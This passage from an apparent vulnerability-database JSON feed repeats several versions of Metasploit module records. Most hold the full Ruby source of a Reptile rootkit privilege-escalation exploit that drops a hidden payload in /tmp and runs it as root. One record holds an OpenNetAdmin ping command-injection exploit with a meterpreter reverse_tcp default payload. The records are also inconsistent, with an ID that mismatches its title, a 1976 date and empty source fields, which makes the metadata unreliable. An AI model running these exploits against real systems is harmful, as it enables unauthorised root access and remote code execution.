upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-30T22:04:17", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 81}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "b823b1f14c7a5bd31c0775aa1b6c282a", "type": "metasploit", "bulletinFamily": "exploit", "title": "OpenNetAdmin Ping Command Injection", "description": "This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.\n", "published": "2019-12-14T13:26:19", "modified": "2020-02-21T14:47:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-04-01T04:24:46", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:BFCAA366878D7FCAE90C7E768E811056", "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "THREATPOST:632759D60B28FE2A37B9762C6DA379A1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0430-1"]}, {"type": "redhat", "idList": ["RHSA-2020:1216", "RHSA-2020:1209", "RHSA-2020:1167", "RHSA-2020:1151", "RHSA-2020:1150", "RHSA-2020:1091", "RHSA-2020:1084", "RHSA-2020:1070", "RHSA-2020:1051", "RHSA-2020:1047"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2163-1:45CE2"]}, {"type": "kitploit", "idList": ["KITPLOIT:1710775484454139668"]}, {"type": "securelist", "idList": ["SECURELIST:7D9A01DD8611D300EF58902DCC55E3DD"]}], "modified": "2020-04-01T04:24:46"}, "score": {"value": 1.0, "vector": "NONE", "modified": "2020-04-01T04:24:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'OpenNetAdmin Ping Command Injection',\n 'Description' => %q{\n This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.\n },\n 'Author' =>\n [\n 'mattpascoe', # Vulnerability discovery and exploit\n 'Onur ER <onur@onurer.net>' # Metasploit module\n ],\n 'References' =>\n [\n ['EDB', '47691']\n ],\n 'DisclosureDate' => '2019-11-19',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' =>\n [\n ['Automatic Target', {}]\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 80,\n 'payload' => 'linux/x86/meterpreter/reverse_tcp'\n },\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('VHOST', [false, 'HTTP server virtual host']),\n OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])\n ]\n )\n deregister_options('CMDSTAGER::FLAVOR')\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'encode_params' => false,\n 'vars_post' => {\n 'xajax' => 'window_open',\n 'xajaxargs[]' => 'app_about'\n }\n })\n\n unless res\n return CheckCode::Unknown 'Connection failed'\n end\n\n unless res.body =~ /OpenNetAdmin/i\n return CheckCode::Safe\n end\n\n opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\\d\\.]+)/).flatten.first\n version = Gem::Version.new(opennetadmin_version)\n\n if version\n vprint_status \"OpenNetAdmin version #{version}\"\n end\n\n if version.between?(Gem::Version.new('8.5.14'), Gem::Version.new('18.1.1'))\n return CheckCode::Appears\n end\n\n CheckCode::Detected\n end\n\n def exploit\n print_status('Exploiting...')\n execute_cmdstager(flavor: :printf)\n end\n\n def execute_command(cmd, opts = {})\n begin\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'encode_params' => false,\n 'vars_post' => {\n 'xajax' => 'window_submit',\n 'xajaxargs[]' => ['tooltips', \"ip=>;#{CGI.escape(cmd)};\", 'ping']\n }\n })\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-01T04:24:46", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 82}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-01T08:48:54", "history": [], "viewCount": 44, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:BFCAA366878D7FCAE90C7E768E811056", "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "THREATPOST:632759D60B28FE2A37B9762C6DA379A1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0430-1"]}, {"type": "redhat", "idList": ["RHSA-2020:1216", "RHSA-2020:1209", "RHSA-2020:1167", "RHSA-2020:1151", "RHSA-2020:1150", "RHSA-2020:1091", "RHSA-2020:1084", "RHSA-2020:1070", "RHSA-2020:1051", "RHSA-2020:1047"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2163-1:45CE2"]}, {"type": "kitploit", "idList": ["KITPLOIT:1710775484454139668"]}, {"type": "securelist", "idList": ["SECURELIST:7D9A01DD8611D300EF58902DCC55E3DD"]}], "modified": "2020-04-01T04:24:46"}, "score": {"value": 1.0, "vector": "NONE", "modified": "2020-04-01T04:24:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-01T08:48:54", "differentElements": ["sourceData"], "edition": 83}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-01T20:49:48", "history": [], "viewCount": 45, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:BFCAA366878D7FCAE90C7E768E811056", "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "THREATPOST:632759D60B28FE2A37B9762C6DA379A1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0430-1"]}, {"type": "redhat", "idList": ["RHSA-2020:1216", "RHSA-2020:1209", "RHSA-2020:1167", "RHSA-2020:1151", "RHSA-2020:1150", "RHSA-2020:1091", "RHSA-2020:1084", "RHSA-2020:1070", "RHSA-2020:1051", "RHSA-2020:1047"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2163-1:45CE2"]}, {"type": "kitploit", "idList": ["KITPLOIT:1710775484454139668"]}, {"type": "securelist", "idList": ["SECURELIST:7D9A01DD8611D300EF58902DCC55E3DD"]}], "modified": "2020-04-01T04:24:46"}, "score": {"value": 1.0, "vector": "NONE", "modified": "2020-04-01T04:24:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-01T20:49:48", "differentElements": ["sourceData"], "edition": 84}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-02T22:20:06", "history": [], "viewCount": 45, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:BFCAA366878D7FCAE90C7E768E811056", "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "THREATPOST:632759D60B28FE2A37B9762C6DA379A1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0430-1"]}, {"type": "redhat", "idList": ["RHSA-2020:1216", "RHSA-2020:1209", "RHSA-2020:1167", "RHSA-2020:1151", "RHSA-2020:1150", "RHSA-2020:1091", "RHSA-2020:1084", "RHSA-2020:1070", "RHSA-2020:1051", "RHSA-2020:1047"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2163-1:45CE2"]}, {"type": "kitploit", "idList": ["KITPLOIT:1710775484454139668"]}, {"type": "securelist", "idList": ["SECURELIST:7D9A01DD8611D300EF58902DCC55E3DD"]}], "modified": "2020-04-01T04:24:46"}, "score": {"value": 1.0, "vector": "NONE", "modified": "2020-04-01T04:24:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-02T22:20:06", "differentElements": ["sourceData"], "edition": 85}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-03T02:02:28", "history": [], "viewCount": 45, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:BFCAA366878D7FCAE90C7E768E811056", "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "THREATPOST:632759D60B28FE2A37B9762C6DA379A1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0430-1"]}, {"type": "redhat", "idList": ["RHSA-2020:1216", "RHSA-2020:1209", "RHSA-2020:1167", "RHSA-2020:1151", "RHSA-2020:1150", "RHSA-2020:1091", "RHSA-2020:1084", "RHSA-2020:1070", "RHSA-2020:1051", "RHSA-2020:1047"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2163-1:45CE2"]}, {"type": "kitploit", "idList": ["KITPLOIT:1710775484454139668"]}, {"type": "securelist", "idList": ["SECURELIST:7D9A01DD8611D300EF58902DCC55E3DD"]}], "modified": "2020-04-01T04:24:46"}, "score": {"value": 1.0, "vector": "NONE", "modified": "2020-04-01T04:24:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-03T02:02:28", "differentElements": ["modified", "published"], "edition": 86}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-03T10:23:38", "history": [], "viewCount": 45, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "exploitdb", "idList": ["EDB-ID:48280", "EDB-ID:48279"]}, {"type": "threatpost", "idList": ["THREATPOST:CB31619614FD5E23CA0F7DEC57D992BE", "THREATPOST:6423D51E252EC53A6308409E7309A1D4"]}, {"type": "kitploit", "idList": ["KITPLOIT:2402789086774512349"]}, {"type": "mssecure", "idList": ["MSSECURE:B88202FB5B97F91B4C2853079E60CFF1"]}, {"type": "redhat", "idList": ["RHSA-2020:1300", "RHSA-2020:1296", "RHSA-2020:1292"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:06A339F80D9CFDB5313421C5F794E93D"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2168-1:FCB8B"]}, {"type": "f5", "idList": ["F5:K88125023"]}, {"type": "ubuntu", "idList": ["USN-4315-1"]}, {"type": "coresecurity", "idList": ["CORE-2020-0002"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892167", "OPENVAS:1361412562310892166"]}, {"type": "ics", "idList": ["ICSA-20-093-01"]}, {"type": "zdt", "idList": ["1337DAY-ID-34179"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1288"]}], "modified": "2020-04-03T10:23:38"}, "score": {"value": 1.5, "vector": "NONE", "modified": "2020-04-03T10:23:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-03T10:23:38", "differentElements": ["modified", "published", "sourceData"], "edition": 87}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-03T15:03:05", "history": [], "viewCount": 45, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "hackerone", "idList": ["H1:837733"]}, {"type": "thn", "idList": ["THN:1D059A29F13AF81A28C2D2770E5CD2E6"]}, {"type": "zdt", "idList": ["1337DAY-ID-34180", "1337DAY-ID-34181", "1337DAY-ID-34186", "1337DAY-ID-34185", "1337DAY-ID-34182"]}, {"type": "exploitdb", "idList": ["EDB-ID:48280"]}, {"type": "threatpost", "idList": ["THREATPOST:CB31619614FD5E23CA0F7DEC57D992BE", "THREATPOST:6423D51E252EC53A6308409E7309A1D4"]}, {"type": "kitploit", "idList": ["KITPLOIT:2402789086774512349"]}, {"type": "mssecure", "idList": ["MSSECURE:B88202FB5B97F91B4C2853079E60CFF1"]}, {"type": "redhat", "idList": ["RHSA-2020:1300", "RHSA-2020:1296", "RHSA-2020:1292"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:06A339F80D9CFDB5313421C5F794E93D"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2168-1:FCB8B"]}, {"type": "f5", "idList": ["F5:K88125023"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892166"]}], "modified": "2020-04-03T15:03:05"}, "score": {"value": 3.5, "vector": "NONE", "modified": "2020-04-03T15:03:05"}}, "objectVersion": "1.4", "sourceHref": 